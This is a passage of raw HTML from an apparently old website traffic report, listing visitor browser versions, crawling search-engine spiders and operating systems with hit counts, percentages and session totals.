SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7085</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.24%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">665</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Other Netscape Compatible</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1701</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java 1.1</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1403</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">475</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>InternetSeer.com</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1383</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1379</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java1.1.3</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">780</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.23%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.3 (crawler@fast.no; http://fast.no/support.php?c=faqs/crawler)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>WebTV</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">376</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">93</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.2 test</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">331</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>60231</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>95.56%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>9777</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopNetscape"><!--Browsers & Platforms::Netscape Browsers--></A> <!-- WT_H1>Netscape Browsers</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Netscape Browsers</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Netscape browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index21.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Netscape Browsers</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Netscape Browsers</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6072</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">344</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">773</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.91%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">223</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">92</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7085</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>665</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopExplorer"><!--Browsers & Platforms::Microsoft Explorer Browsers--></A> <!-- WT_H1>Microsoft Explorer Browsers</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Microsoft Explorer Browsers</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Microsoft Explorer browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index22.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Microsoft Explorer Browsers</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Microsoft Explorer Browsers</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34633</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">74.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5305</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 6.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9935</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1044</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1822</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.92%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">255</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">84</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>46474</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6622</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopSpiders"><!--Browsers & Platforms::Visiting Spiders--></A> <!-- WT_H1>Visiting Spiders</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Visiting Spiders</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies all robots, spiders, crawlers and search services (i.e. Alta Vista, Lycos, and Excite) visiting the site.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index23.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Visiting Spiders</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Visiting Spiders</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Spider</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">744</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36.88%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ArchitextSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">225</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">220</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">187</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">169</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Gulliver</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.8%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3-1.0</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>tivraSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.72%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">54</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Openfind data gatherer, Openbot</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.28%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Spiders Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>1829</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>90.67%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>847</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopPlatforms"><!--Browsers & Platforms::Most Used Platforms--></A> <!-- WT_H1>Most Used Platforms</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Platforms</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the operating systems most used by the visitors to the site.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index24.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Most Used Platforms</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Used Platforms</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Platform</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Others</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40899</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64.89%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8873</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows NT</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12108</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1337</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows Win32s</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4860</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.71%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows 95</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3760</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">558</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Macintosh</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1183</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Linux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">191</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>SunOS</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Platforms Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <!-- ----------------- ------------- --> <!-- ----------------- ------------- --> <a name="Glossary"><!--Glossary::Glossary--></A> <!-- WT_H1>Glossary</WT_H1 --> <!-- Start Strip --> 